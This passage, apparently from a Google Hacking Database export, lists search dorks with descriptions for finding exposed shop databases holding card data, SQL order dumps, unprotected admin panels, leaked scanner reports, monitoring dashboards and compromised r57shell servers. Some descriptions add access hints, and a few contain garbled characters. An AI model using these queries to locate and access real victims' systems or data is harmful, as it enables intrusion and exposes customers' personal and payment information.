02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}], "Sensitive Online Shopping Info": [{"dork": "site:ups.com intitle:\"Ups Package tracking\" intext:\"1Z ### ### ## #### ### #\"", "description": "Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit"}, {"dork": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "description": "Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html"}, {"dork": "intext:\"Dumping data for table `orders`\"", "description": "Dork finds SQL dump files containing personal information\nBy warlock72"}, {"dork": "POWERED BY HIT JAMMER 1.0!", "description": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice."}, {"dork": "inurl:\"shopadmin.asp\" \"Shop Administrators only\"", "description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html"}, {"dork": "inurl:\"/database/comersus.mdb\"", "description": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems."}, {"dork": "inurl:shopdbtest.asp", "description": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database). The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect."}, {"dork": "\"More Info about MetaCart Free\"", "description": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc)."}, {"dork": "inurl:midicart.mdb", "description": "MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name)."}, {"dork": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "description": "X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information."}, {"dork": "dcid= bn= pin code=", "description": "Information disclosure of reservation information,which can leak to many other leaks.\nAll related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passport \nBy popshark1"}, {"dork": "intext:\" Design & Developed by Antique Touch - INDIA\"", "description": "# Google Dork: intext:\" Design & Developed by Antique Touch - INDIA\"\r\n# Sensitive Online Shopping Info\r\n# Date: 20/07/2021 \r\n# Exploit Author: Cliffe Zeding"}, {"dork": "inurl:/commodities.php?id=", "description": "# Google Dork: inurl:/commodities.php?id=\r\n# Sensitive Online Shopping Info\r\n# Date: 08/11/2021 \r\n# Exploit Author: Harshit Koli"}, {"dork": "inurl:product-list.php?id=", "description": "# Google Dork: inurl:product-list.php?id=\r\n# Sensitive Online Shopping Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:mail.* intitle:Dashboard", "description": "# Google Dork: site:mail.* intitle:Dashboard\r\n# Sensitive Online Shopping Info\r\n# Date: 12/11/2021 \r\n# Exploit Author: Soriful Islam Shoaib"}], "Network or Vulnerability Data": [{"dork": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "description": "The finger command on unix displays information about the system users. This search displays the webinterface for that command."}, {"dork": "inurl:portscan.php \"from Port\"|\"Port Range\"", "description": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners."}, {"dork": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "description": "Lots of information leakage on these pages about active network services, server info, network connections, etc.."}, {"dork": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "description": "Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages."}, {"dork": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "description": "Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted."}, {"dork": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "description": "Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form."}, {"dork": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "description": "see and control JVC webcameras, you can move the camera, zoom... change the settings, etc...."}, {"dork": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "description": "List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198"}, {"dork": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "description": "People who have foolishly published an audit of their machine(s) on the net with some server info as well"}, {"dork": "inurl:login.jsp.bak", "description": "JSP programmer anyone? You can read this!"}, {"dork": "inurl:ovcgi/jovw", "description": "An HP Java network management tool. It is a sign that a network may not be configured properly."}, {"dork": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "description": "Information about proxy servers, internal ip addresses and other network sensitive stuff."}, {"dork": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "description": "gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities."}, {"dork": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "description": "Results include many varius Network activity logs"}, {"dork": "inurl:finger.cgi", "description": "Finger\nSubmitted by: Christy Philip Mathew"}, {"dork": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "description": "Search the Munin monitoring graphs\nDaniel Maldonado\nhttp://caceriadespammers.blogspot.com.ar"}, {"dork": "intitle:\"bandwidthd\" \"programmed by david hinkle, commissioned by derbytech wireless networking.\"", "description": "BandwidthD Search Report.\nIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar"}, {"dork": "intext:\"Web Application Report\" intext:\"This report was created by IBM Security AppScan\" ext:pdf", "description": "To search IBM AppScan vulnerability Report.\nFrom Huhai-chiang"}, {"dork": "(inurl:\"8080/monitorix\" & intext:\"Hostname\") | inurl:\"8080/monitorix-cgi\"", "description": "Monitorix - system monitoring tool web interface,\nby neon"}, {"dork": "\"generated by Munin\" inurl:index -intext:index localhost", "description": "Panels of Munin networks.\nEnjoy.\nDork by Rootkit Pentester."}, {"dork": "inurl:zabbix.php AND intext:\"Zabbix SIA\"", "description": "Dork for ZABBIX Network Monitoring System (version 3.2.x)\n--\n@verovan"}, {"dork": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "description": "Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend."}, {"dork": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "description": "Search the CACTI system of SNMP graphs\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "description": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format."}, {"dork": "\"This report lists\" \"identified by Internet Scanner\"", "description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"Network Host Assessment Report\" \"Internet Scanner\"", "description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"SnortSnarf alert page\"", "description": "snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed."}, {"dork": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "description": "This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more."}, {"dork": "filetype:pdf \"Assessment Report\" nessus", "description": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow."}, {"dork": "filetype:vsd vsd network -samples -examples", "description": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign."}, {"dork": "intitle:\"ADSL Configuration page\"", "description": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack."}, {"dork": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "description": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack."}, {"dork": "\"Looking Glass\" (inurl:\"lg/\" | inurl:lookingglass)", "description": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network."}, {"dork": "ACID \"by Roman Danyliw\" filetype:php", "description": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more."}, {"dork": "intitle:\"Microsoft Site Server Analysis\"", "description": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files."}, {"dork": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "description": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs"}, {"dork": "\"apricot - admin\" 00h", "description": "This search shows the webserver access stats as the user \"admin\". The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in."}, {"dork": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "description": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously."}, {"dork": "site:netcraft.com intitle:That.Site.Running Apache", "description": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info."}, {"dork": "\"Powered by phpOpenTracker\" Statistics", "description": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking."}, {"dork": "inurl:\"/catalog.nsf\" intitle:catalog", "description": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. An attacker can back the url down to the \"/catalog.nsf\" part if needed."}, {"dork": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "description": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool."}, {"dork": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "description": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)"}, {"dork": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "description": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\""}, {"dork": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "description": "Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason."}, {"dork": "inurl:/cgi-bin/finger? \"In real life\"", "description": "The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts."}, {"dork": "inurl:statrep.nsf -gov", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example: * 1. Statistics Reports - 1. System * 1. Statistics Reports - 2. Mail & Database * 1. Statistics Reports - 3. Communications * 1. Statistics Reports - 4. Network * 1. Statistics Reports - 5. Clusters * 1. Statistics Reports - 6. Web Server & Retriever * 1. Statistics Reports - 7. Calendaring Scheduling * 2. Alarms * 3. Events * 4. Spreadsheet Export * 5. Graphs - 1. System Statistics * 5. Graphs - 2. System Loads * 5. Graphs - 3. System Resources * 6. Trouble Tickets - 1. Alarm * 6. Trouble Tickets - 2. Event * 7. Analysis Report * 8. File Statistics * 9. Single Copy Object Store Statistics"}, {"dork": "inurl:webutil.pl", "description": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime"}, {"dork": "inurl:/adm-cfgedit.php", "description": "PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :("}, {"dork": "filetype:log intext:\"ConnectionManager2\"", "description": "ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in...."}, {"dork": "inurl:testcgi xitami", "description": "Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server."}, {"dork": "\"Output produced by SysWatch *\"", "description": "sysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..)."}, {"dork": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "description": "TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API."}, {"dork": "ext:cfg radius.cfg", "description": "\"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods\"This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc."}, {"dork": "intitle:\"start.managing.the.device\" remote pbx acc", "description": "MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)"}, {"dork": "inurl:\"install/install.php\"", "description": "This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info."}, {"dork": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "description": "This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)"}, {"dork": "intitle:\"BNBT Tracker Info\"", "description": "This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being \"tracked\", the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!"}, {"dork": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "description": "This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being \"tracked\".This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is."}, {"dork": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "description": "This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?!"}, {"dork": "inurl:status.cgi?host=all", "description": "Nagios Status page. See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first."}, {"dork": "\"The following report contains confidential information\" vulnerability -search", "description": "This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network."}, {"dork": "\"Shadow Security Scanner performed a vulnerability assessment\"", "description": "This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system."}, {"dork": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "description": "This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network."}, {"dork": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "description": "***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/)."}, {"dork": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "description": "This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure."}, {"dork": "intitle:r57shell +uname -bbpress", "description": "compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team"}, {"dork": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "description": "Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first."}, {"dork": "\"Web Application Assessment Report\" ext:pdf", "description": "To search HP WebInspect Scan Report. The dorks is searching report that\nscanned before 2016. After 2016, the service of web inspect migrated to HP\nEnterprise.\nFrom Huhai-chiang"}, {"dork": "inurl:\"/weathermap/weathermap-cacti-plugin.php\"", "description": "Map IT infrastructure through Weathermap Cacti plugin\nIng. Daniel Maldonado http://www.caceriadespammers.com.ar"}, {"dork": "inurl:ipf.conf -intext:ipf.conf ext:conf", "description": "IP Filter is software that provides packet filtering capabilities on a\nSolaris system. On a properly setup system, it can be used to build a\nfirewall. ipf.conf is the firewall configuration file which can be exposed\nto view the ip filter rules set up on the device.\nAyushman Dutta\nUniversity of Houston"}, {"dork": "intitle:\"Nessus Scan Report\" ext:html", "description": "Finds reports left behind by Nessus (vulnerability scanner)\nDxtroyer"}, {"dork": "\"[boot loader]\" \"WINNT\" ext:ini", "description": "Finds boot.ini files, showing you what operating systems are running on the server\nDxtroyer"}, {"dork": "intitle: \"Generated by Acunetix WVS Reporter\"", "description": "intitle: \"Generated by Acunetix WVS Reporter\"\r\n\r\nFinds reports left behind by Acunetix (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intitle:\"Burp Scanner Report\" | \"Report generated by Burp Scanner\"", "description": "intitle:\"Burp Scanner Report\" | \"Report generated by Burp Scanner\"\r\n\r\nFinds reports left behind by Burp Scanner (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intitle:\"netsparker scan report\" ext:pdf", "description": "intitle:\"netsparker scan report\" ext:pdf\r\n\r\nFinds reports left behind by Netsparker (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "\"IBM Security AppScan Report\" ext:pdf", "description": "\"IBM Security AppScan Report\" ext:pdf\r\n\r\nThis dork show results that was created by IBM Security AppScan Standard\r\n\r\nManhNho"}, {"dork": "\":: Arachni Web Application Security Report\"", "description": "\":: Arachni Web Application Security Report\"\r\n\r\nFinds reports left behind by Arachini (web vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by Nibbleblog\"", "description": "Finding blogs that are powerded by the Nibbleblog CMS.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:\"Statistics Report for HAProxy\" + \"statistics report for pid\"", "description": "intitle:\"Statistics Report for HAProxy\" + \"statistics report for pid\"\r\n\r\nStatistics Report for HAProxy\r\n\r\nManhNho"}, {"dork": "inurl:/munin/localdomain/localhost.localdomain/open_files.html", "description": "Search for the page that generated by Munin, this page will contains the\r\nsensitive information on the systems & application."}, {"dork": "inurl:\"AllItems.aspx?FolderCTID=\" \"firewall\" | \"proxy\" | \"configuration\" | \"account\"", "description": "IT infrastructure documents, device configuration and documentation and\r\nother juicy info.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"index of /ups.com/WebTracking\"", "description": "*Google* dork description: Emotet infected domains. Emotet is a banking\r\ntrojan malware program which\r\nobtains financial information by injecting computer code\r\n into the networking stack\r\n of an infected computer\r\n\r\n*Google Search: *\"index of /ups.com/WebTracking\"\r\n\r\n*Submitted by:* Alfie\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Malware Analysis Report\"", "description": "intitle:\"Malware Analysis Report\"\r\nThis dork show many report Malware Analysis of organization.\r\n\r\nKhanhNNVN"}, {"dork": "\"ansible.log\" | \"playbook.yaml\" | \".ansible.cfg\" | \"playbook.yml\" | host.ini intitle:\"index of\"", "description": "Target's system configuration, networks, etc...\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:ZAP Scanning Report Summary of Alerts ext:html", "description": "intext:ZAP Scanning Report Summary of Alerts ext:html\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nOWASP ZAP reports.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:department intext:\"hardware inventory\" firewall router ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw )", "description": "Hardware information, mainly firewall and routers.\r\nChange the words to fit your needs.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/scripts/wgate", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n++ SAP ITS System Information ++\r\n\r\ninurl:/scripts/wgate\r\n- Potential for RFC exploit to extra valuable data\r\n- Potential theft of username and password\r\n- Potential creation of SAP_ALL privilege users\r\n- Potential vulnerable to RFC callback\r\n- 1 Vulnerabillites on Exploit DB available for SAP its at the time of writing\r\n- Source and explanation for the Exploit:\r\n - https://securityaffairs.co/wordpress/71908/security/sap-configuration-flaw.html\r\n- 386 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:nagios/cgi-bin/status.cgi", "description": "Exploit Title: Nagios monitor data\r\nGoogle dork: inurl:nagios/cgi-bin/status.cgi\r\nDate:2/8/2019\r\nExploit author: techjohnny"}, {"dork": "allinurl:\"/SilverStream/Meta/\"", "description": "Category : Advisories and Vulnerabilities\r\n\r\nDescription : Dork for finding to disclose data from websites which uses\r\nSilverStream software. It is a web services-oriented applications.\r\n\r\nBelow are the list of Vulnerability Multiple data disclose\r\n- silver stream server live statistic of time, memory status, session,\r\nlicense, and more\r\n- Current sessions details of the users who logged in in websites\r\n- Software License key also can find setup of VM to download application\r\n- Access to Silveradmin.jar file which administer the SilverStream Server\r\n- Database name disclose as well as version, Table, columns names etc\r\n- Admin data\r\n- And So on....\r\n\r\nBelow are few more option available to get data you can play around on URL\r\n/SilverStream/ :-\r\n\r\nAdministration\r\nClasses\r\nClusterAdmin\r\nDownloads\r\nErrorLogs\r\nFullTextIndexer\r\nListeners\r\nLogin\r\nLogout\r\nMeta\r\nObjectstore\r\nPages\r\nPermissions\r\nRenamer\r\nResources\r\nSecurity\r\nSessions\r\nStatistics\r\nTimestamps\r\nVersionCheck\r\n\r\nDork : allinurl:\"/SilverStream/Meta/\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo", "description": "Find DHCP and router logs stored on AWS s3 bucket\r\n\r\n# Google Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo\r\n# Date: [30-7-2019]\r\n# Dork Author: [Mohammed*_*]\r\n\r\nEndless OS logs\r\n\r\nGoogle Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:endlessos"}, {"dork": "intitle:prometheus time series collection and processing server inurl:/alerts", "description": "Finding prometheus dashboards\r\n\r\nDorks:\r\nintitle:prometheus time series collection and processing server inurl:/alerts\r\nintitle:prometheus time series collection and processing server inurl:/targets\r\n\r\n# Date: [14-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:Host Report inurl:ganglia", "description": "Ganglia Dashboard (monitoring tool for computing systems, clusters and\r\nnetwork)\r\n\r\n# Google Dork: intitle:Host Report inurl:ganglia\r\n# Date: [20-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"/Serviceability?adapter=device.statistics.configuration\"", "description": "Google Dork: inurl:\"/Serviceability?adapter=device.statistics.configuration\"\r\n\r\nCategory: Configuration File Exposure (OWASP TOP 10(2017) A3-Sensitive Data\r\nExposure)\r\n\r\nDescription: It exposes control panel configuration file which contains\r\nwhole network configuration and internal logs of CISCO IP phones.\r\n\r\nAuthor Name: Harsha Deepa"}, {"dork": "inurl:zabbix/zabbix.php", "description": "Zabbix monitoring dashboard\r\n\r\n# Google Dork: \r\ninurl:zabbix/zabbix.php\r\ninurl:zabbix/hosts.php\r\n\r\n# Date: [28-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"OpenNMS web console\" inurl:opennms/index.jsp", "description": "OpenNMS network monitoring dashboard login pages\r\n\r\n# Google Dork: intitle:\"OpenNMS web console\" inurl:opennms/index.jsp\r\n# Date: [28-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"Dashboards\" AND inurl:\"/zabbix/zabbix.php?action=dashboard.list\"", "description": "This dork provide more specific result in google searching and possibly allow view dashboard with guest login."}, {"dork": "intitle:\"Cacti\" AND inurl:\"/monitor/monitor.php\"", "description": "# Dork #\r\n\r\nintitle:\"Cacti\" AND 